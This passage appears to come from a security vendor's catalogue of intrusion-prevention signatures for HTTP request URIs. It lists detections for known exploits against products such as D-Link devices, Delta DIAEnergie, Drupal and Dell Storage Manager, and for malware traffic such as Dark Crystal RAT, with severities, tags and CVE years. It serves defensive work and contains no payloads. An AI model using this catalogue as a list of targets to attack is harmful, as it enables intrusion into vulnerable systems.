Last changed: sgpkg-ips-418-4219
Vulnerability: CoreHTTP-Url-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Count-Cgi-BOF

About this situation: Count.cgi buffer overflow
Context: HTTP Request URI
Severity: 10
Tags: Unix, Any Hardware, Muhammad A. Muquit wwwcount, CVE1999, Unix not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Count.cgi-Vulnerabilities
Description:
Back to top

HTTP_CSU-Count-Cgi-Disclosure

About this situation: Count.cgi gif disclosure
Context: HTTP Request URI
Severity: 7
Tags: Unix, Any Hardware, Muhammad A. Muquit wwwcount, CVE1999, Unix not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1621-5242
Vulnerability: Count.cgi-Vulnerabilities
Description:
Back to top

HTTP_CSU-Craft-CMS-Remote-Code-Execution-CVE-2024-56145

About this situation: An attempt to exploit a vulnerability in Craft CMS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Craft CMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1830-5242
Vulnerability: Craft-CMS-Remote-Code-Execution-CVE-2024-56145
Description:
Back to top

HTTP_CSU-Cutwail-Bot-Activity

About this situation: Cutwail Bot activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Cutwail-Bot
Description:
Back to top

HTTP_CSU-D-Link-Command-Injection-CVE-2024-3273

About this situation: An attempt to exploit a vulnerability in D-Link NAS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1713-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: D-Link-Command-Injection-CVE-2024-3273
Description:
Back to top

HTTP_CSU-D-Link-DAP-1160-Authentication-Bypass

About this situation: An HTTP request to "/tools_firmw.htm" detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DAP-1160, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Description:
Back to top

HTTP_CSU-D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078

About this situation: An attempt to exploit a vulnerability in D-Link detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078
Description:
Back to top

HTTP_CSU-D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557

About this situation: An attempt to exploit a vulnerability in D-Link DIR-825 routers detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557
Description:
Back to top

HTTP_CSU-D-Link-DSL-2750B-Command-Injection

About this situation: An attempt to exploit a vulnerability in D-Link DSL-2750B detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: D-Link-DSL-2750B-Command-Injection
Description:
Back to top

HTTP_CSU-D-Link-DSR-250N-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in D-Link DSR-250N detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, D-Link DSR-250N, CVE2020, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: D-Link-DSR-250N-Denial-of-Service
Description:
Back to top

HTTP_CSU-D-Link-Hardcoded-Credentials-CVE-2024-3272

About this situation: An attempt to exploit a vulnerability in D-Link NAS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: D-Link-Hardcoded-Credentials-CVE-2024-3272
Description:
Back to top

HTTP_CSU-D-Link-Router-Directory-Traversal

About this situation: An attempted exploit against a D-Link router was detected.
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, D-Link, CVE2018, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: D-Link-Router-Directory-Traversal
Description:
Back to top

HTTP_CSU-D-Link-Router-Password-Recovery

About this situation: D-Link DIR-300 DIR-600 DIR-615 routers Password Recovery
Context: HTTP Request URI
Severity: 10
Tags: Windows, Linux, Any Hardware, D-Link, Windows not specific, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: D-Link-Router-Password-Recovery
Description:
Back to top

HTTP_CSU-D-Tale-RCE

About this situation: An attempt to exploit a vulnerability in D-Tale detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, D-Tale, CVE2025, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: D-Tale-RCE
Description:
Back to top

HTTP_CSU-Dahua-Username-Password-Disclosure

About this situation: A vulnerability in Dahua cameras detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Dahua, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Dahua-Username-Password-Disclosure
Description:
Back to top

HTTP_CSU-Danmec-Trojan-SQL-Injection-Attack

About this situation: DanMec SQL injection attempt was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1784-5242
Vulnerability: Danmec
Description:
Back to top

HTTP_CSU-Dark-Crystal-RAT-Infection-Traffic

About this situation: Dark Crystal RAT infection traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Dark-Crystal-RAT-Infection-Traffic
Description:
Back to top

HTTP_CSU-Darkness-Bot-Activity

About this situation: Darkness bot activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Darkness-Bot
Description:
Back to top

HTTP_CSU-Darwin-Streaming-Server-Parse-Xml-File-Disclosure

About this situation: Vulnerable Darwin Streaming Server script accessed, possible file disclosure
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Darwin Streaming Server, Apple QuickTime, CVE2003, Windows not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Darwin-Streaming-Server-Parse-Xml-File-Disclosure
Description:
Back to top

HTTP_CSU-Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Dell Storage Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Dell Storage Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Dell ScriptLogic Asset Manager detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Dell ScriptLogic Asset Manager, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection
Description:
Back to top

HTTP_CSU-Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Dell SonicWALL GMS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall Analyzer, SonicWall GMS, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-850-5242
Last changed: sgpkg-ips-850-5242
Vulnerability: Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure
Description:
Back to top

HTTP_CSU-Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Dell Storage Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Dell Storage Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1712-5242
Last changed: sgpkg-ips-1712-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DIAEnergie detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS
Description:
Back to top

HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1540-5242
Last changed: sgpkg-ips-1540-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection
Description:
Back to top

HTTP_CSU-DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415

About this situation: An attempt to exploit a vulnerability in DevDojo Voyager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, DevDojo Voyager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415
Description:
Back to top

HTTP_CSU-DevDojo-Voyager-Reflected-XSS-CVE-2024-55416

About this situation: An attempt to exploit a vulnerability in DevDojo Voyager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, DevDojo Voyager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: DevDojo-Voyager-Reflected-XSS-CVE-2024-55416
Description:
Back to top

HTTP_CSU-DFind-Scanner-Usage

About this situation: DFind Scanner activity detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, DFind, Any Operating System not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-505-5211
Vulnerability: HTTP-DFind-Scanner
Description:
Back to top

HTTP_CSU-Dicoogle-PACS-Web-Server-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Dicoogle PACS Web Server detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Dicoogle PACS, Windows not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Dicoogle-PACS-Web-Server-Directory-Traversal
Description:
Back to top

HTTP_CSU-Disk-Pulse-Enterprise-GET-Buffer-Overflow

About this situation: A Disk Pulse Enterprise GET Buffer Overflow vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Disk Pulse, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1016-5242
Vulnerability: Disk-Pulse-Enterprise-GET-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402

About this situation: An attempt to exploit a vulnerability in Django detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Vulnerability: Django-GIS-Functions-And-Aggregates-SQL-Injection-CVE-2020-9402
Description:
Back to top

HTTP_CSU-DNSChanger-Scan-URL

About this situation: An URL associated with DNSChanger
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1107-5242
Last changed: sgpkg-ips-1107-5242
Vulnerability: GhostDNS
Description:
Back to top

HTTP_CSU-Docpile-Init-Path-Parameter-Remote-File-Inclusion

About this situation: Detected an attempt to exploit remote file inclusion vunerability in docpile:we
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, docpile:we, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-160-2032
Last changed: sgpkg-ips-160-2032
Vulnerability: Docpile-Init-Path-Parameter-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Dolibarr-ERP-CRM-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Dolibarr detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Dolibarr-ERP-CRM-SQL-Injection
Description:
Back to top

HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence

About this situation: Detects various encoded ../ and null-byte sequences
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2000, CVE2001, CVE2004, CVE2015, Any Operating System not specific, Any Software not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-1769-5242
Vulnerability: Sojourn-File-Disclosure
Store-Cgi-Directory-Traversal
HTTP-Cgi-story-Pl-Directory-Traversal
Directory-Traversal
Php-Addslashes-Null-Character-Parsing-Error
SysAid-Rdslogs-Arbitrary-File-Upload
Description:
Back to top

HTTP_CSU-Dotcms-Cmsfilter-Assets-Access-Control-Weakness

About this situation: An attempt to exploit a vulnerability in dotCMS dotCMS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, dotCMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1351-5242
Vulnerability: Dotcms-Cmsfilter-Assets-Access-Control-Weakness
Description:
Back to top

HTTP_CSU-Dotdotdot-Directory-Traversal

About this situation: Dotdotdot directory traversal detected
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, AOLserver, CVE2001, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-610-5211
Vulnerability: HTTP-AOLserver-Dotdotdot-Directory-Traversal
Directory-Traversal
Description:
Back to top

HTTP_CSU-Double-Encoding-Usage

About this situation: Double encoding attack technique detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Double-Encoding-Usage-In-URI
Description:
Back to top

HTTP_CSU-Downloader-Abw3-Activity-Detected

About this situation: Downloader Abw3 activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Description:
Back to top

HTTP_CSU-DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123

About this situation: An attempt to exploit a vulnerability in DrayTek VigorConnect detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Any Hardware, DrayTek Vigor, CVE2021, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Vulnerability: DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123
Description:
Back to top

HTTP_CSU-Drupal-Coder-Module-Coder_upgrade.run-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Drupal Coder detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-796-5211
Vulnerability: Drupal-Coder-Module-Coder_upgrade.run.php-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Drupal-Restws-Module-Page-Callback-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Drupal detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-782-5211
Vulnerability: Drupal-Restws-Module-Page-Callback-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Dynamicdesktopmedia

About this situation: DynamicDesktopMedia traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, DynamicDesktopMedia, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Dynamicdesktopmedia
Description:
Back to top

HTTP_CSU-e107-ePing-Plugin-Command-Execution

About this situation: Command execution exploit against ePing plugin for e107
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, e107 ePing, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-681-5211
Vulnerability: HTTP-e107-ePing-Plugin-Command-Execution
Description:
Back to top

HTTP_CSU-e107-eTrace-Plugin-Command-Execution

About this situation: Command execution exploit against eTrace plugin for e107
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, e107 eTrace, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-681-5211
Vulnerability: HTTP-e107-eTrace-Plugin-Command-Execution
Description:
Back to top

HTTP_CSU-Easy-Homepage-Edit.cgi-Vulnerability

About this situation: An attempt to exploit a vulnerability in Easy HomePage was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Easy HomePage, CVE2002, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Easy-Homepage-Edit.cgi-Vulnerability
Description:
Back to top

HTTP_CSU-Eaton-Shutdown-Module-DoS

